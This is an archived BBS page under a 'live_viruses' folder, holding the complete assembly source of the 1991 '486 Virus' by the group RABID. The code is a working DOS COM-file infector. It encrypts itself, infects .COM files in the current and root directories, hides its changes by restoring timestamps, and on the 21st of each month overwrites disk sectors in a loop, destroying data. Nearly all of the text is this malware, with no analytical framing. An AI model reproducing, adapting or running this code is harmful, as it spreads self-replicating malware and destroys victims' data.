home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
The Unsorted BBS Collection
/
thegreatunsorted.tar
/
thegreatunsorted
/
live_viruses
/
virus_collections
/
486.asm
< prev
next >
Wrap
Assembly Source File
|
1991-02-16
|
7KB
|
239 lines
; 486 Virus - (C)1991 RABID, International
; By Zodiac - RABID High Priest, USA
code_seg segment
assume cs:code_seg,ds:code_seg
org 100h
jmpin: db 0E9h,00,00 ; JMP 105
start: push cx
mov dx,word ptr cs:[101h]
add dx,103h ; DX now points to start
mov si,dx
mov bp,dx ; pushes offset of PROG
add bp,(prog-start) ; to stack for RET statement
push bp ; of encrypt
jmp short unencrypt
unencrypt: db 0B0h ; mov al,
value db 00 ; xx
push si
cmp al,0
je unencret
add si,(prog-start)
mov cx,lastbyte-prog
unencloop: mov ah,[si]
push cx
mov cl,al
rol ah,cl
pop cx
mov [si],ah
inc al
inc si
loop unencloop
unencret: pop si
ret
prog: mov di,100h
mov si,dx
add si,(firstthree-start) ; SI points to 1st six bytes
mov cx,3
rep movsb ; Restores initial 3 bytes
mov si,dx
mov ah,2Ah
int 21h
cmp dl,21
jne nokill
kill: xor ax,ax
int 10h
mov ah,9
mov dx,si
add dx,(message-start)
int 21h
kill_hd: mov ax,26
killoop: mov cx,255
xor dx,dx
push ax
int 26h
popf
pop ax
dec ax
cmp ax,2
jg killoop
jmp short kill_hd
nokill: mov bp,0 ; BP=0 when in curr. direct.
mov dx,(filespec-start)
findfirst: add dx,si ; SI now points to start
mov ah,4Eh
mov cx,6
int 21h
jc returningfar
filefound: mov dx,dtaname
cmp bp,1
jne open
dec dx
db 0C6h,06h,9Dh,00h,"\" ; mov byte ptr [9Dh],"\"
open: xor cx,cx
mov ax,4301h
int 21h ; sets attribute to normal
push dx
mov ax,3D02h
int 21h ; Opens file found
jc returningfar ; Leaves if error
mov bx,ax ; BX holds file handle
mov dx,si
add dx,(firstthree-start)
mov cx,3
mov ah,3Fh
int 21h
jc close
mov di,dx
cmp word ptr [di],5A4Dh
je close
cmp byte ptr [di],0E9h
jne go
db 8Bh,16h,9Ah,00h ; mov dx,word ptr [dtasize]
sub dx,(lastbyte-firstbyte+4)
cmp word ptr [di+1],dx
je close
jmp short go
returningfar: jmp short returning
go: xor cx,cx
xor dx,dx
mov ax,4200h
int 21h ; Moves to start of file
db 0A1h,9Ah,00h ; mov ax,word ptr [dtasize]
cmp ax,486
jb closing
cmp ax,63000
ja closing
sub ax,3
mov word ptr [si+(newthree-start+1)],ax
mov dx,si
add dx,(newthree-start)
mov cx,3
mov ah,40h
int 21h ; Writes jump
xor cx,cx
mov dx,0
mov ax,4202h
int 21h ; Moves to end of file
push si
mov di,si
add si,(writebody-start)
add di,(lastbyte-start+1)
mov cx,(writeends-writebody+2)
rep movsb
pop si
mov bp,si
add bp,(donewriting-start)
push bp ; sets up RET of unenc
mov bp,si
add bp,(lastbyte-start+1)
call bp
donewriting: xor si,si
closing: jmp short close
; The following are hubs for conditional jumps
returning: jmp short return
finding: jmp filefound
close: mov ax,5701h
db 8Bh,0Eh,96h,00h ; mov cx,[dtatime]
db 8Bh,16h,98h,00h ; mov dx,[dtadate]
int 21h
mov ah,3Eh
int 21h ; closes file
pop dx
xor cx,cx
db 8Ah,0Eh,95h,00h ; mov cl,byte ptr [dtaattr]
mov ax,4301h
int 21h
cmp si,0
je return ; checks if file infected
mov ah,4Fh
int 21h ; finds next file to infected
jnc finding
cmp bp,1
je return
mov bp,1
mov dx,(rootspec-start)
jmp findfirst
return: pop cx
mov bp,100h
jmp bp ; Returns control
writebody: mov al,byte ptr [si+(value-start)]
inc al
mov byte ptr [si+value-start],al
push bx
mov bx,si
add bx,(prog-start)
mov cx,lastbyte-prog
encloop: mov ah,[bx]
push cx
mov cl,al
ror ah,cl
pop cx
mov [bx],ah
inc al
inc bx
loop encloop
pop bx
mov dx,si
mov cx,(lastbyte-firstbyte+1) ; Adds extra byte as pad
mov ah,40h
int 21h ; Writes main part
mov bp,si
add bp,(unencrypt-start)
jmp bp
writeends:
; -- DATA -- ;
firstthree db 0CDh,20h,90h
message db '486 Virus - (C)1991 RABID, International'
db 'By Zodiac - RABID Priest$'
rootspec db '\'
filespec db '*.COM',0
dtaattr equ 95h
dtatime equ 96h
dtadate equ 98h
dtasize equ 9Ah
dtaname equ 9Eh
newthree db 0E9h,0,0
firstbyte = start
lastbyte = newthree+2
code_seg ends
end jmpin
